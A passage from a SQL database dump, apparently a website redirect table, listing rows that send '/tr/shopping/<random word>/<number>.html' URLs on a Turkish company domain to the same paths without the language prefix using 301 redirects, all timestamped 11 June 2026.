00:00:00',301),(76671,'https://3s-technologies.com.tr/tr/shopping/collectivistica/1946729373.html',NULL,'https://3s-technologies.com.tr/shopping/collectivistica/1946729373.html','',1,0,'2026-06-11 09:16:03','0000-00-00 00:00:00',301),(76672,'https://3s-technologies.com.tr/tr/shopping/resourceful/3470816386.html',NULL,'https://3s-technologies.com.tr/shopping/resourceful/3470816386.html','',1,0,'2026-06-11 09:16:06','0000-00-00 00:00:00',301),(76673,'https://3s-technologies.com.tr/tr/shopping/nicolaitan/672684910.html',NULL,'https://3s-technologies.com.tr/shopping/nicolaitan/672684910.html','',1,0,'2026-06-11 09:16:09','0000-00-00 00:00:00',301),(76674,'https://3s-technologies.com.tr/tr/shopping/cruise/1874472163.html',NULL,'https://3s-technologies.com.tr/shopping/cruise/1874472163.html','',1,0,'2026-06-11 09:16:13','0000-00-00 00:00:00',301),(76675,'https://3s-technologies.com.tr/tr/shopping/poisoned/1927211912.html',NULL,'https://3s-technologies.com.tr/shopping/poisoned/1927211912.html','',1,0,'2026-06-11 09:16:26','0000-00-00 00:00:00',301),(76676,'https://3s-technologies.com.tr/tr/shopping/bloodstick/1419957189.html',NULL,'https://3s-technologies.com.tr/shopping/bloodstick/1419957189.html','',1,0,'2026-06-11 09:16:29','0000-00-00 00:00:00',301),(76677,'https://3s-technologies.com.tr/tr/shopping/electrovital/2718955287.html',NULL,'https://3s-technologies.com.tr/shopping/electrovital/2718955287.html','',1,0,'2026-06-11 09:16:32','0000-00-00 00:00:00',301),(76678,'https://3s-technologies.com.tr/tr/shopping/cinnabarine/1451635966.html',NULL,'https://3s-technologies.com.tr/shopping/cinnabarine/1451635966.html','',1,0,'2026-06-11 09:16:35','0000-00-00 00:00:00',301),(76679,'https://3s-technologies.com.tr/tr/shopping/diacatholicon/2211095630.html',NULL,'https://3s-technologies.com.tr/shopping/diacatholicon/2211095630.html','',1,0,'2026-06-11 09:16:38','0000-00-00 00:00:00',301),(76680,'https://3s-technologies.com.tr/tr/shopping/hyrax/1639484039.html',NULL,'https://3s-technologies.com.tr/shopping/hyrax/1639484039.html','',1,0,'2026-06-11 09:16:41','0000-00-00 00:00:00',301),(76681,'https://3s-technologies.com.tr/tr/shopping/jewish/11365753.html',NULL,'https://3s-technologies.com.tr/shopping/jewish/11365753.html','',1,0,'2026-06-11 09:16:48','0000-00-00 00:00:00',301),(76682,'https://3s-technologies.com.tr/tr/shopping/stepmother/2626287853.html',NULL,'https://3s-technologies.com.tr/shopping/stepmother/2626287853.html','',1,0,'2026-06-11 09:16:50','0000-00-00 00:00:00',301),(76683,'https://3s-technologies.com.tr/tr/shopping/epiornis/2532693966.html',NULL,'https://3s-technologies.com.tr/shopping/epiornis/2532693966.html','',1,0,'2026-06-11 09:16:53','0000-00-00 00:00:00',301),(76684,'https://3s-technologies.com.tr/tr/shopping/nidary/2399263007.html',NULL,'https://3s-technologies.com.tr/shopping/nidary/2399263007.html','',1,0,'2026-06-11 09:16:56','0000-00-00 00:00:00',301),(76685,'https://3s-technologies.com.tr/tr/shopping/newsbook/3596022244.html',NULL,'https://3s-technologies.com.tr/shopping/newsbook/3596022244.html','',1,0,'2026-06-11 09:16:59','0000-00-00 00:00:00',301),(76686,'https://3s-technologies.com.tr/tr/shopping/platyelminthes/2900157285.html',NULL,'https://3s-technologies.com.tr/shopping/platyelminthes/2900157285.html','',1,0,'2026-06-11 09:17:02','0000-00-00 00:00:00',301),(76687,'https://3s-technologies.com.tr/tr/shopping/kavasses/4106651473.html',NULL,'https://3s-technologies.com.tr/shopping/kavasses/4106651473.html','',1,0,'2026-06-11 09:17:16','0000-00-00 00:00:00',301),(76688,'https://3s-technologies.com.tr/tr/shopping/animalism/2758367029.html',NULL,'https://3s-technologies.com.tr/shopping/animalism/2758367029.html','',1,0,'2026-06-11 09:17:19','0000-00-00 00:00:00',301),(76689,'https://3s-technologies.com.tr/tr/shopping/foliomort/300910675.html',NULL,'https://3s-technologies.com.tr/shopping/foliomort/300910675.html','',1,0,'2026-06-11 09:17:22','0000-00-00 00:00:00',301),(76690,'https://3s-technologies.com.tr/tr/shopping/oilskin/31490363.html',NULL,'https://3s-technologies.com.tr/shopping/oilskin/31490363.html','',1,0,'2026-06-11 09:17:25','0000-00-00 00:00:00',301),(76691,'https://3s-technologies.com.tr/tr/shopping/peculiarity/3421226083.html',NULL,'https://3s-technologies.com.tr/shopping/peculiarity/3421226083.html','',1,0,'2026-06-11 09:17:28','0000-00-00 00:00:00',301),(76692,'https://3s-technologies.com.tr/tr/shopping/astrochemical/2628875558.html',NULL,'https://3s-technologies.com.tr/shopping/astrochemical/2628875558.html','',1,0,'2026-06-11 09:17:31','0000-00-00 00:00:00',301),(76693,'https://3s-technologies.com.tr/tr/shopping/pitchiness/1977407165.html',NULL,'https://3s-technologies.com.tr/shopping/pitchiness/1977407165.html','',1,0,'2026-06-11 09:17:41','0000-00-00 00:00:00',301),(76694,'https://3s-technologies.com.tr/tr/shopping/bdellostoma/279573998.html',NULL,'https://3s-technologies.com.tr/shopping/bdellostoma/279573998.html','',1,0,'2026-06-11 09:17:45','0000-00-00 00:00:00',301),(76695,'https://3s-technologies.com.tr/tr/shopping/anglophilic/4279890193.html',NULL,'https://3s-technologies.com.tr/shopping/anglophilic/4279890193.html','',1,0,'2026-06-11 09:17:48','0000-00-00 00:00:00',301),(76696,'https://3s-technologies.com.tr/tr/shopping/nickeledanddimed/4134559725.html',NULL,'https://3s-technologies.com.tr/shopping/nickeledanddimed/4134559725.html','',1,0,'2026-06-11 09:17:51','0000-00-00 00:00:00',301),(76697,'https://3s-technologies.com.tr/tr/shopping/unhouseled/1392310744.html',NULL,'https://3s-technologies.com.tr/shopping/unhouseled/1392310744.html','',1,0,'2026-06-11 09:17:54','0000-00-00 00:00:00',301),(76698,'https://3s-technologies.com.tr/tr/shopping/smokehouse/1070963506.html',NULL,'https://3s-technologies.com.tr/shopping/smokehouse/1070963506.html','',1,0,'2026-06-11 09:17:57','0000-00-00 00:00:00',301),(76699,'https://3s-technologies.com.tr/tr/shopping/indigestibleness/4193868834.html',NULL,'https://3s-technologies.com.tr/shopping/indigestibleness/4193868834.html','',1,0,'2026-06-11 09:18:29','0000-00-00 00:00:00',301),(76700,'https://3s-technologies.com.tr/tr/shopping/salicifolia/223034429.html',NULL,'https://3s-technologies.com.tr/shopping/salicifolia/223034429.html','',1,0,'2026-06-11 09:18:31','0000-00-00 00:00:00',301),(76701,'https://3s-technologies.com.tr/tr/shopping/eleutheropetalous/3041947541.html',NULL,'https://3s-technologies.com.tr/shopping/eleutheropetalous/3041947541.html','',1,0,'2026-06-11 09:18:34','0000-00-00 00:00:00',301),(76702,'https://3s-technologies.com.tr/tr/shopping/stomatopodous/198928180.html',NULL,'https://3s-technologies.com.tr/shopping/stomatopodous/198928180.html','',1,0,'2026-06-11 09:18:37','0000-00-00 00:00:00',301),(76703,'https://3s-technologies.com.tr/tr/shopping/antiquarianism/2483285482.html',NULL,'https://3s-technologies.com.tr/shopping/antiquarianism/2483285482.html','',1,0,'2026-06-11 09:18:40','0000-00-00 00:00:00',301),(76704,'https://3s-technologies.com.tr/tr/shopping/heptandria/1119513743.html',NULL,'https://3s-technologies.com.tr/shopping/heptandria/1119513743.html','',1,0,'2026-06-11 09:18:43','0000-00-00 00:00:00',301),(76705,'https://3s-technologies.com.tr/tr/shopping/horsetrail/4224335480.html',NULL,'https://3s-technologies.com.tr/shopping/horsetrail/4224335480.html','',1,0,'2026-06-11 09:18:48','0000-00-00 00:00:00',301),(76706,'https://3s-technologies.com.tr/tr/shopping/clergy/3347938625.html',NULL,'https://3s-technologies.com.tr/shopping/clergy/3347938625.html','',1,0,'2026-06-11 09:18:51','0000-00-00 00:00:00',301),(76707,'https://3s-technologies.com.tr/tr/shopping/cockatoo/2509374486.html',NULL,'https://3s-technologies.com.tr/shopping/cockatoo/2509374486.html','',1,0,'2026-06-11 09:18:54','0000-00-00 00:00:00',301),(76708,'https://3s-technologies.com.tr/tr/shopping/hirneola/3119987342.html',NULL,'https://3s-technologies.com.tr/shopping/hirneola/3119987342.html','',1,0,'2026-06-11 09:18:57','0000-00-00 00:00:00',301),(76709,'https://3s-technologies.com.tr/tr/shopping/cenobita/3667934112.html',NULL,'https://3s-technologies.com.tr/shopping/cenobita/3667934112.html','',1,0,'2026-06-11 09:19:00','0000-00-00 00:00:00',301),(76710,'https://3s-technologies.com.tr/tr/shopping/hopscotch/3613982248.html',NULL,'https://3s-technologies.com.tr/shopping/hopscotch/3613982248.html','',1,0,'2026-06-11 09:19:03','0000-00-00 00:00:00',301),(76711,'https://3s-technologies.com.tr/tr/shopping/drawcansir/2146057081.html',NULL,'https://3s-technologies.com.tr/shopping/drawcansir/2146057081.html','',1,0,'2026-06-11 09:19:09','0000-00-00 00:00:00',301),(76712,'https://3s-technologies.com.tr/tr/shopping/heartquake/1299503626.html',NULL,'https://3s-technologies.com.tr/shopping/heartquake/1299503626.html','',1,0,'2026-06-11 09:19:12','0000-00-00 00:00:00',301),(76713,'https://3s-technologies.com.tr/tr/shopping/acanthopterygii/1217859925.html',NULL,'https://3s-technologies.com.tr/shopping/acanthopterygii/1217859925.html','',1,0,'2026-06-11 09:19:15','0000-00-00 00:00:00',301),(76714,'https://3s-technologies.com.tr/tr/shopping/chanterelle/3624490038.html',NULL,'https://3s-technologies.com.tr/shopping/chanterelle/3624490038.html','',1,0,'2026-06-11 09:19:18','0000-00-00 00:00:00',301),(76715,'https://3s-technologies.com.tr/tr/shopping/melanesian/2993127926.html',NULL,'https://3s-technologies.com.tr/shopping/melanesian/2993127926.html','',1,0,'2026-06-11 09:19:21','0000-00-00 00:00:00',301),(76716,'https://3s-technologies.com.tr/tr/shopping/thallophyta/1335771175.html',NULL,'https://3s-technologies.com.tr/shopping/thallophyta/1335771175.html','',1,0,'2026-06-11 09:19:24','0000-00-00 00:00:00',301),(76717,'https://3s-technologies.com.tr/tr/shopping/ouistiti/1523711341.html',NULL,'https://3s-technologies.com.tr/shopping/ouistiti/1523711341.html','',1,0,'2026-06-11 09:19:29','0000-00-00 00:00:00',301),(76718,'https://3s-technologies.com.tr/tr/shopping/sclerotome/2288364727.html',NULL,'https://3s-technologies.com.tr/shopping/sclerotome/2288364727.html','',1,0,'2026-06-11 09:19:33','0000-00-00 00:00:00',301),(76719,'https://3s-technologies.com.tr/tr/shopping/mortierii/272657081.html',NULL,'https://3s-technologies.com.tr/shopping/mortierii/272657081.html','',1,0,'2026-06-11 09:19:36','0000-00-00 00:00:00',301),(76720,'https://3s-technologies.com.tr/tr/shopping/disinhabited/3940754968.html',NULL,'https://3s-technologies.com.tr/shopping/disinhabited/3940754968.html','',1,0,'2026-06-11 09:19:39','0000-00-00 00:00:00',301),(76721,'https://3s-technologies.com.tr/tr/shopping/mysteries/1655627010.html',NULL,'https://3s-technologies.com.tr/shopping/mysteries/1655627010.html','',1,0,'2026-06-11 09:19:42','0000-00-00 00:00:00',301),(76722,'https://3s-technologies.com.tr/tr/shopping/jahveh/3684845524.html',NULL,'https://3s-technologies.com.tr/shopping/jahveh/3684845524.html','',1,0,'2026-06-11 09:19:45','0000-00-00 00:00:00',301),(76723,'https://3s-technologies.com.tr/tr/shopping/linseywoolsey/1880391181.html',NULL,'https://3s-technologies.com.tr/shopping/linseywoolsey/1880391181.html','',1,0,'2026-06-11 09:19:57','0000-00-00 00:00:00',301),(76724,'https://3s-technologies.com.tr/tr/shopping/alcoholometrical/2872674379.html',NULL,'https://3s-technologies.com.tr/shopping/alcoholometrical/2872674379.html','',1,0,'2026-06-11 09:19:59','0000-00-00 00:00:00',301),(76725,'https://3s-technologies.com.tr/tr/shopping/metallograph/2510586585.html',NULL,'https://3s-technologies.com.tr/shopping/metallograph/2510586585.html','',1,0,'2026-06-11 09:20:02','0000-00-00 00:00:00',301),(76726,'https://3s-technologies.com.tr/tr/shopping/disquisitionary/544102347.html',NULL,'https://3s-technologies.com.tr/shopping/disquisitionary/544102347.html','',1,0,'2026-06-11 09:20:05','0000-00-00 00:00:00',301),(76727,'https://3s-technologies.com.tr/tr/shopping/infrugiferous/544265870.html',NULL,'https://3s-technologies.com.tr/shopping/infrugiferous/544265870.html','',1,0,'2026-06-11 09:20:08','0000-00-00 00:00:00',301),(76728,'https://3s-technologies.com.tr/tr/shopping/discursion/3149319140.html',NULL,'https://3s-technologies.com.tr/shopping/discursion/3149319140.html','',1,0,'2026-06-11 09:20:16','0000-00-00 00:00:00',301),(76729,'https://3s-technologies.com.tr/tr/shopping/unvariable/669401569.html',NULL,'https://3s-technologies.com.tr/shopping/unvariable/669401569.html','',1,0,'2026-06-11 09:20:18','0000-00-00 00:00:00',301),(76730,'https://3s-technologies.com.tr/tr/shopping/constrict/19965840.html',NULL,'https://3s-technologies.com.tr/shopping/constrict/19965840.html','',1,0,'2026-06-11 09:20:21','0000-00-00 00:00:00',301),(76731,'https://3s-technologies.com.tr/tr/shopping/capacious/522998670.html',NULL,'https://3s-technologies.com.tr/shopping/capacious/522998670.html','',1,0,'2026-06-11 09:20:24','0000-00-00 00:00:00',301),(76732,'https://3s-technologies.com.tr/tr/shopping/excursion/628381709.html',NULL,'https://3s-technologies.com.tr/shopping/excursion/628381709.html','',1,0,'2026-06-11 09:20:27','0000-00-00 00:00:00',301),(76733,'https://3s-technologies.com.tr/tr/shopping/toggle/428588703.html',NULL,'https://3s-technologies.com.tr/shopping/toggle/428588703.html','',1,0,'2026-06-11 09:20:30','0000-00-00 00:00:00',301),(76734,'https://3s-technologies.com.tr/tr/shopping/witherod/3162478355.html',NULL,'https://3s-technologies.com.tr/shopping/witherod/3162478355.html','',1,0,'2026-06-11 09:20:33','0000-00-00 00:00:00',301),(76735,'https://3s-technologies.com.tr/tr/shopping/ejectment/4069645079.html',NULL,'https://3s-technologies.com.tr/shopping/ejectment/4069645079.html','',1,0,'2026-06-11 09:20:36','0000-00-00 00:00:00',301),(76736,'https://3s-technologies.com.tr/tr/shopping/selfindulgence/795656003.html',NULL,'https://3s-technologies.com.tr/shopping/selfindulgence/795656003.html','',1,0,'2026-06-11 09:20:47','0000-00-00 00:00:00',301),(76737,'https://3s-technologies.com.tr/tr/shopping/outer/2125027952.html',NULL,'https://3s-technologies.com.tr/shopping/outer/2125027952.html','',1,0,'2026-06-11 09:20:49','0000-00-00 00:00:00',301),(76738,'https://3s-technologies.com.tr/tr/shopping/frontrunner/4177428477.html',NULL,'https://3s-technologies.com.tr/shopping/frontrunner/4177428477.html','',1,0,'2026-06-11 09:20:53','0000-00-00 00:00:00',301),(76739,'https://3s-technologies.com.tr/tr/shopping/resenting/984808268.html',NULL,'https://3s-technologies.com.tr/shopping/resenting/984808268.html','',1,0,'2026-06-11 09:20:55','0000-00-00 00:00:00',301),(76740,'https://3s-technologies.com.tr/tr/shopping/superscript/2366679695.html',NULL,'https://3s-technologies.com.tr/shopping/superscript/2366679695.html','',1,0,'2026-06-11 09:20:58','0000-00-00 00:00:00',301),(76741,'https://3s-technologies.com.tr/tr/shopping/botanic/2952201414.html',NULL,'https://3s-technologies.com.tr/shopping/botanic/2952201414.html','',1,0,'2026-06-11 09:21:02','0000-00-00 00:00:00',301),(76742,'https://3s-technologies.com.tr/tr/shopping/coordinating/1916735981.html',NULL,'https://3s-technologies.com.tr/shopping/coordinating/1916735981.html','',1,0,'2026-06-11 09:21:04','0000-00-00 00:00:00',301),(76743,'https://3s-technologies.com.tr/tr/shopping/bisected/3403573643.html',NULL,'https://3s-technologies.com.tr/shopping/bisected/3403573643.html','',1,0,'2026-06-11 09:21:07','0000-00-00 00:00:00',301),(76744,'https://3s-technologies.com.tr/tr/shopping/evaluative/3484005245.html',NULL,'https://3s-technologies.com.tr/shopping/evaluative/3484005245.html','',1,0,'2026-06-11 09:21:10','0000-00-00 00:00:00',301),(76745,'https://3s-technologies.com.tr/tr/shopping/protactic/2480823506.html',NULL,'https://3s-technologies.com.tr/shopping/protactic/2480823506.html','',1,0,'2026-06-11 09:21:13','0000-00-00 00:00:00',301),(76746,'https://3s-technologies.com.tr/tr/shopping/appoint/234058682.html',NULL,'https://3s-technologies.com.tr/shopping/appoint/234058682.html','',1,0,'2026-06-11 09:21:16','0000-00-00 00:00:00',301),(76747,'https://3s-technologies.com.tr/tr/shopping/bathysphere/939988588.html',NULL,'https://3s-technologies.com.tr/shopping/bathysphere/939988588.html','',1,0,'2026-06-11 09:21:19','0000-00-00 00:00:00',301),(76748,'https://3s-technologies.com.tr/tr/shopping/statistics/647901337.html',NULL,'https://3s-technologies.com.tr/shopping/statistics/647901337.html','',1,0,'2026-06-11 09:21:22','0000-00-00 00:00:00',301),(76749,'https://3s-technologies.com.tr/tr/shopping/circumscriptive/2950989315.html',NULL,'https://3s-technologies.com.tr/shopping/circumscriptive/2950989315.html','',1,0,'2026-06-11 09:21:25','0000-00-00 00:00:00',301),(76750,'https://3s-technologies.com.tr/tr/shopping/below/323229519.html',NULL,'https://3s-technologies.com.tr/shopping/below/323229519.html','',1,0,'2026-06-11 09:21:28','0000-00-00 00:00:00',301),(76751,'https://3s-technologies.com.tr/tr/shopping/spiriting/1937024098.html',NULL,'https://3s-technologies.com.tr/shopping/spiriting/1937024098.html','',1,0,'2026-06-11 09:21:31','0000-00-00 00:00:00',301),(76752,'https://3s-technologies.com.tr/tr/shopping/multiply/3801436866.html',NULL,'https://3s-technologies.com.tr/shopping/multiply/3801436866.html','',1,0,'2026-06-11 09:21:34','0000-00-00 00:00:00',301),(76753,'https://3s-technologies.com.tr/tr/shopping/frogbit/3157889583.html',NULL,'https://3s-technologies.com.tr/shopping/frogbit/3157889583.html','',1,0,'2026-06-11 09:21:37','0000-00-00 00:00:00',301),(76754,'https://3s-technologies.com.tr/tr/shopping/bashibazouk/3670569773.html',NULL,'https://3s-technologies.com.tr/shopping/bashibazouk/3670569773.html','',1,0,'2026-06-11 09:21:40','0000-00-00 00:00:00',301),(76755,'https://3s-technologies.com.tr/tr/shopping/transacted/1961130331.html',NULL,'https://3s-technologies.com.tr/shopping/transacted/1961130331.html','',1,0,'2026-06-11 09:21:43','0000-00-00 00:00:00',301),(76756,'https://3s-technologies.com.tr/tr/shopping/conventionalizing/1476426583.html',NULL,'https://3s-technologies.com.tr/shopping/conventionalizing/1476426583.html','',1,0,'2026-06-11 09:21:46','0000-00-00 00:00:00',301),(76757,'https://3s-technologies.com.tr/tr/shopping/setback/860554869.html',NULL,'https://3s-technologies.com.tr/shopping/setback/860554869.html','',1,0,'2026-06-11 09:21:49','0000-00-00 00:00:00',301),(76758,'https://3s-technologies.com.tr/tr/shopping/deferred/526375359.html',NULL,'https://3s-technologies.com.tr/shopping/deferred/526375359.html','',1,0,'2026-06-11 09:21:52','0000-00-00 00:00:00',301),(76759,'https://3s-technologies.com.tr/tr/shopping/restrainable/2002150191.html',NULL,'https://3s-technologies.com.tr/shopping/restrainable/2002150191.html','',1,0,'2026-06-11 09:21:55','0000-00-00 00:00:00',301),(76760,'https://3s-technologies.com.tr/tr/shopping/interlay/653865747.html',NULL,'https://3s-technologies.com.tr/shopping/interlay/653865747.html','',1,0,'2026-06-11 09:21:58','0000-00-00 00:00:00',301),(76761,'https://3s-technologies.com.tr/tr/shopping/fifing/4145324386.html',NULL,'https://3s-technologies.com.tr/shopping/fifing/4145324386.html','',1,0,'2026-06-11 09:22:01','0000-00-00 00:00:00',301),(76762,'https://3s-technologies.com.tr/tr/shopping/cotised/2295589176.html',NULL,'https://3s-technologies.com.tr/shopping/cotised/2295589176.html','',1,0,'2026-06-11 09:22:04','0000-00-00 00:00:00',301),(76763,'https://3s-technologies.com.tr/tr/shopping/clanked/1719618255.html',NULL,'https://3s-technologies.com.tr/shopping/clanked/1719618255.html','',1,0,'2026-06-11 09:22:08','0000-00-00 00:00:00',301),(76764,'https://3s-technologies.com.tr/tr/shopping/electrocute/405087420.html',NULL,'https://3s-technologies.com.tr/shopping/electrocute/405087420.html','',1,0,'2026-06-11 09:22:11','0000-00-00 00:00:00',301),(76765,'https://3s-technologies.com.tr/tr/shopping/locusting/1711393170.html',NULL,'https://3s-technologies.com.tr/shopping/locusting/1711393170.html','',1,0,'2026-06-11 09:22:14','0000-00-00 00:00:00',301),(76766,'https://3s-technologies.com.tr/tr/shopping/solmization/3055907088.html',NULL,'https://3s-technologies.com.tr/shopping/solmization/3055907088.html','',1,0,'2026-06-11 09:22:17','0000-00-00 00:00:00',301),(76767,'https://3s-technologies.com.tr/tr/shopping/brought/2127192542.html',NULL,'https://3s-technologies.com.tr/shopping/brought/2127192542.html','',1,0,'2026-06-11 09:22:20','0000-00-00 00:00:00',301),(76768,'https://3s-technologies.com.tr/tr/shopping/corrival/2838878952.html',NULL,'https://3s-technologies.com.tr/shopping/corrival/2838878952.html','',1,0,'2026-06-11 09:22:23','0000-00-00 00:00:00',301),(76769,'https://3s-technologies.com.tr/tr/shopping/rhetorizing/1661639360.html',NULL,'https://3s-technologies.com.tr/shopping/rhetorizing/1661639360.html','',1,0,'2026-06-11 09:22:26','0000-00-00 00:00:00',301),(76770,'https://3s-technologies.com.tr/tr/shopping/recommendable/1572608207.html',NULL,'https://3s-technologies.com.tr/shopping/recommendable/1572608207.html','',1,0,'2026-06-11 09:22:29','0000-00-00 00:00:00',301),(76771,'https://3s-technologies.com.tr/tr/shopping/pilon/1252992642.html',NULL,'https://3s-technologies.com.tr/shopping/pilon/1252992642.html','',1,0,'2026-06-11 09:22:32','0000-00-00 00:00:00',301),(76772,'https://3s-technologies.com.tr/tr/shopping/conventionalize/3752213474.html',NULL,'https://3s-technologies.com.tr/shopping/conventionalize/3752213474.html','',1,0,'2026-06-11 09:22:35','0000-00-00 00:00:00',301),(76773,'https://3s-technologies.com.tr/tr/shopping/globe/3220409659.html',NULL,'https://3s-technologies.com.tr/shopping/globe/3220409659.html','',1,0,'2026-06-11 09:22:38','0000-00-00 00:00:00',301),(76774,'https://3s-technologies.com.tr/tr/shopping/dissever/608093576.html',NULL,'https://3s-technologies.com.tr/shopping/dissever/608093576.html','',1,0,'2026-06-11 09:22:41','0000-00-00 00:00:00',301),(76775,'https://3s-technologies.com.tr/tr/shopping/decarbonate/2736896457.html',NULL,'https://3s-technologies.com.tr/shopping/decarbonate/2736896457.html','',1,0,'2026-06-11 09:22:44','0000-00-00 00:00:00',301),(76776,'https://3s-technologies.com.tr/tr/shopping/courtleet/3672993955.html',NULL,'https://3s-technologies.com.tr/shopping/courtleet/3672993955.html','',1,0,'2026-06-11 09:22:47','0000-00-00 00:00:00',301),(76777,'https://3s-technologies.com.tr/tr/shopping/interambulacrums/4122264530.html',NULL,'https://3s-technologies.com.tr/shopping/interambulacrums/4122264530.html','',1,0,'2026-06-11 09:22:50','0000-00-00 00:00:00',301),(76778,'https://3s-technologies.com.tr/tr/shopping/compatibility/2760839183.html',NULL,'https://3s-technologies.com.tr/shopping/compatibility/2760839183.html','',1,0,'2026-06-11 09:22:53','0000-00-00 00:00:00',301),(76779,'https://3s-technologies.com.tr/tr/shopping/barege/94433016.html',NULL,'https://3s-technologies.com.tr/shopping/barege/94433016.html','',1,0,'2026-06-11 09:22:56','0000-00-00 00:00:00',301),(76780,'https://3s-technologies.com.tr/tr/shopping/deligation/2224725916.html',NULL,'https://3s-technologies.com.tr/shopping/deligation/2224725916.html','',1,0,'2026-06-11 09:22:59','0000-00-00 00:00:00',301),(76781,'https://3s-technologies.com.tr/tr/shopping/forwardness/565420206.html',NULL,'https://3s-technologies.com.tr/shopping/forwardness/565420206.html','',1,0,'2026-06-11 09:23:02','0000-00-00 00:00:00',301),(76782,'https://3s-technologies.com.tr/tr/shopping/flaminical/1914311767.html',NULL,'https://3s-technologies.com.tr/shopping/flaminical/1914311767.html','',1,0,'2026-06-11 09:23:05','0000-00-00 00:00:00',301),(76783,'https://3s-technologies.com.tr/tr/shopping/scapegrace/2957956909.html',NULL,'https://3s-technologies.com.tr/shopping/scapegrace/2957956909.html','',1,0,'2026-06-11 09:23:08','0000-00-00 00:00:00',301),(76784,'https://3s-technologies.com.tr/tr/shopping/beeve/913944992.html',NULL,'https://3s-technologies.com.tr/shopping/beeve/913944992.html','',1,0,'2026-06-11 09:23:15','0000-00-00 00:00:00',301),(76785,'https://3s-technologies.com.tr/tr/shopping/ramoon/4147748568.html',NULL,'https://3s-technologies.com.tr/shopping/ramoon/4147748568.html','',1,0,'2026-06-11 09:23:17','0000-00-00 00:00:00',301),(76786,'https://3s-technologies.com.tr/tr/shopping/enter/1062652133.html',NULL,'https://3s-technologies.com.tr/shopping/enter/1062652133.html','',1,0,'2026-06-11 09:23:20','0000-00-00 00:00:00',301),(76787,'https://3s-technologies.com.tr/tr/shopping/camping/2559045094.html',NULL,'https://3s-technologies.com.tr/shopping/camping/2559045094.html','',1,0,'2026-06-11 09:23:23','0000-00-00 00:00:00',301),(76788,'https://3s-technologies.com.tr/tr/shopping/inferential/146220290.html',NULL,'https://3s-technologies.com.tr/shopping/inferential/146220290.html','',1,0,'2026-06-11 09:23:26','0000-00-00 00:00:00',301),(76789,'https://3s-technologies.com.tr/tr/shopping/mortmal/3554704982.html',NULL,'https://3s-technologies.com.tr/shopping/mortmal/3554704982.html','',1,0,'2026-06-11 09:23:29','0000-00-00 00:00:00',301),(76790,'https://3s-technologies.com.tr/tr/shopping/orchises/3945651304.html',NULL,'https://3s-technologies.com.tr/shopping/orchises/3945651304.html','',1,0,'2026-06-11 09:23:32','0000-00-00 00:00:00',301),(76791,'https://3s-technologies.com.tr/tr/shopping/sermonizing/1275886760.html',NULL,'https://3s-technologies.com.tr/shopping/sermonizing/1275886760.html','',1,0,'2026-06-11 09:23:35','0000-00-00 00:00:00',301),(76792,'https://3s-technologies.com.tr/tr/shopping/australize/3260571272.html',NULL,'https://3s-technologies.com.tr/shopping/australize/3260571272.html','',1,0,'2026-06-11 09:23:38','0000-00-00 00:00:00',301),(76793,'https://3s-technologies.com.tr/tr/shopping/chrysothamnus/1444536692.html',NULL,'https://3s-technologies.com.tr/shopping/chrysothamnus/1444536692.html','',1,0,'2026-06-11 09:23:41','0000-00-00 00:00:00',301),(76794,'https://3s-technologies.com.tr/tr/shopping/nonnative/3217821938.html',NULL,'https://3s-technologies.com.tr/shopping/nonnative/3217821938.html','',1,0,'2026-06-11 09:23:45','0000-00-00 00:00:00',301),(76795,'https://3s-technologies.com.tr/tr/shopping/ferociously/68180489.html',NULL,'https://3s-technologies.com.tr/shopping/ferociously/68180489.html','',1,0,'2026-06-11 09:23:47','0000-00-00 00:00:00',301),(76796,'https://3s-technologies.com.tr/tr/shopping/acton/434553097.html',NULL,'https://3s-technologies.com.tr/shopping/acton/434553097.html','',1,0,'2026-06-11 09:23:50','0000-00-00 00:00:00',301),(76797,'https://3s-technologies.com.tr/tr/shopping/spaced/133288302.html',NULL,'https://3s-technologies.com.tr/shopping/spaced/133288302.html','',1,0,'2026-06-11 09:23:53','0000-00-00 00:00:00',301),(76798,'https://3s-technologies.com.tr/tr/shopping/scarification/3707653386.html',NULL,'https://3s-technologies.com.tr/shopping/scarification/3707653386.html','',1,0,'2026-06-11 09:23:56','0000-00-00 00:00:00',301),(76799,'https://3s-technologies.com.tr/tr/shopping/apocrypha/3635350800.html',NULL,'https://3s-technologies.com.tr/shopping/apocrypha/3635350800.html','',1,0,'2026-06-11 09:23:59','0000-00-00 00:00:00',301),(76800,'https://3s-technologies.com.tr/tr/shopping/roughness/2892009467.html',NULL,'https://3s-technologies.com.tr/shopping/roughness/2892009467.html','',1,0,'2026-06-11 09:24:02','0000-00-00 00:00:00',301),(76801,'https://3s-technologies.com.tr/tr/shopping/deflectable/2261156988.html',NULL,'https://3s-technologies.com.tr/shopping/deflectable/2261156988.html','',1,0,'2026-06-11 09:24:06','0000-00-00 00:00:00',301),(76802,'https://3s-technologies.com.tr/tr/shopping/ventricular/627006071.html',NULL,'https://3s-technologies.com.tr/shopping/ventricular/627006071.html','',1,0,'2026-06-11 09:24:08','0000-00-00 00:00:00',301),(76803,'https://3s-technologies.com.tr/tr/shopping/offshore/2788910958.html',NULL,'https://3s-technologies.com.tr/shopping/offshore/2788910958.html','',1,0,'2026-06-11 09:24:11','0000-00-00 00:00:00',301),(76804,'https://3s-technologies.com.tr/tr/shopping/divisively/3106923658.html',NULL,'https://3s-technologies.com.tr/shopping/divisively/3106923658.html','',1,0,'2026-06-11 09:24:15','0000-00-00 00:00:00',301),(76805,'https://3s-technologies.com.tr/tr/shopping/halfhour/3973297749.html',NULL,'https://3s-technologies.com.tr/shopping/halfhour/3973297749.html','',1,0,'2026-06-11 09:24:19','0000-00-00 00:00:00',301),(76806,'https://3s-technologies.com.tr/tr/shopping/renner/3156677484.html',NULL,'https://3s-technologies.com.tr/shopping/renner/3156677484.html','',1,0,'2026-06-11 09:24:22','0000-00-00 00:00:00',301),(76807,'https://3s-technologies.com.tr/tr/shopping/approvingly/3534580388.html',NULL,'https://3s-technologies.com.tr/shopping/approvingly/3534580388.html','',1,0,'2026-06-11 09:24:25','0000-00-00 00:00:00',301),(76808,'https://3s-technologies.com.tr/tr/shopping/faintly/1623043698.html',NULL,'https://3s-technologies.com.tr/shopping/faintly/1623043698.html','',1,0,'2026-06-11 09:24:28','0000-00-00 00:00:00',301),(76809,'https://3s-technologies.com.tr/tr/shopping/tiffing/1858984297.html',NULL,'https://3s-technologies.com.tr/shopping/tiffing/1858984297.html','',1,0,'2026-06-11 09:24:31','0000-00-00 00:00:00',301),(76810,'https://3s-technologies.com.tr/tr/shopping/prognostic/3872527353.html',NULL,'https://3s-technologies.com.tr/shopping/prognostic/3872527353.html','',1,0,'2026-06-11 09:24:34','0000-00-00 